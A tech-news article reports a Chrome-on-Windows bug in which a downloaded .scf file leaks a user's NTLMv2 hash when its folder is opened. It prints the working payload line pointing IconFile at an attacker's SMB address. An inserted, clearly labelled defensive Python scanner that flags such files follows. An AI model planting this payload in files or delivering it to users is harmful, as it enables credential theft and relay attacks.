Security

Chrome on Windows has credential theft bug

.SCF files present ID, password to fetch icons for attack file

By Richard Chirgwin

Google's Chrome team is working to fix a credential theft bug that strikes if the browser is running on Microsoft Windows.

The bug is exploited if a user is tricked into clicking a link that downloads a Windows .scf file (the ancient Shell Command File format, a shortcut to Show Desktop since Windows 98).

This exploits two things: how Chrome handles .scf files, and how Windows handles them.

Most download links are sanitised by Chrome – for example, as discoverers DefenseCode write, since Stuxnet the browser has forced a .download extension onto Windows LNK files – but not .scf files.

That arrangement means that if the user clicks the link, the malicious .scf file will lie dormant in the /Downloads directory until the next time the user opens the folder.

Here's where the Windows flaw comes in: merely viewing the folder will trigger Windows to try and retrieve an icon associated with the .scf file.

To retrieve the icon, the user's machine will present credentials to a server – their user ID and hashed password on a corporate network, or the home group's credentials if it's a personal machine.

Naturally enough, since this involves credentials, they're available to the attacker.

If the .scf file contains this code:

[Shell]
IconFile=\\170.170.170.170\icon

… then the user ID and hashed password will be presented to the attacker's IP.

Since it's an NTLMv2-hashed password, recovering it would need offline brute-force cracking, but SecureCode points out that the user ID and the hash can be presented to other services.

“The remote SMB server set up by the attacker is ready to capture the victim's username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password” writes Defense Code's Bosko Stankovic [emphasis added].

Password brute-forcing is only moderately difficult, the post says: an NVIDIA GTX 1080 card should manage to recover an eight-character password in less than a day.

While they wait for a fix from Google, Chrome users should go to their Advanced settings and make Chrome ask where each downloaded file is to be saved: that way, the .scf extension will be revealed.
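A defender's check for the file described above, as an added example that is not from the article or from DefenseCode: it scans a folder for .scf files whose IconFile entry names a remote host. The function names and the default Downloads path are assumptions, and the sample bytes are constructed from the article's snippet.

```python
import re
from pathlib import Path

# Two leading slashes name a remote host; forward slashes are flagged too, conservatively.
UNC_RE = re.compile(r'^[\\/]{2}([^\\/]+)')

def decode(raw: bytes) -> str:
    """Decode .scf bytes; handle UTF-16/UTF-8 BOMs, else fall back to Latin-1."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    if raw[:3] == b"\xef\xbb\xbf":
        return raw[3:].decode("utf-8", errors="replace")
    return raw.decode("latin-1")

def remote_icon_hosts(raw: bytes) -> list[str]:
    """Return hosts referenced by IconFile= entries that point at a UNC path."""
    hosts = []
    for line in decode(raw).splitlines():
        key, sep, value = line.partition("=")
        if not sep or key.strip().lower() != "iconfile":
            continue
        m = UNC_RE.match(value.strip().strip('"'))
        if m:
            hosts.append(m.group(1))
    return hosts

def scan_folder(folder: Path) -> dict[str, list[str]]:
    """Map each .scf file under `folder` to the remote hosts its icon references."""
    findings = {}
    for path in folder.rglob("*"):
        if path.is_file() and path.suffix.lower() == ".scf":
            hosts = remote_icon_hosts(path.read_bytes())
            if hosts:
                findings[str(path)] = hosts
    return findings

# Constructed samples: the article's file, and a harmless one with a local icon.
SAMPLE_REMOTE = b"[Shell]\r\nIconFile=\\\\170.170.170.170\\icon\r\n"
SAMPLE_LOCAL = b"[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"

if __name__ == "__main__":
    import sys
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else Path.home() / "Downloads"
    for name, hosts in scan_folder(target).items():
        print(f"{name}: IconFile points at remote host(s) {', '.join(hosts)}")
```

Run it with a folder path as the only argument; with no argument it scans the current user's Downloads folder.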

Google told Kaspersky's ThreatPost it's aware of the issue and is working on a fix. ®
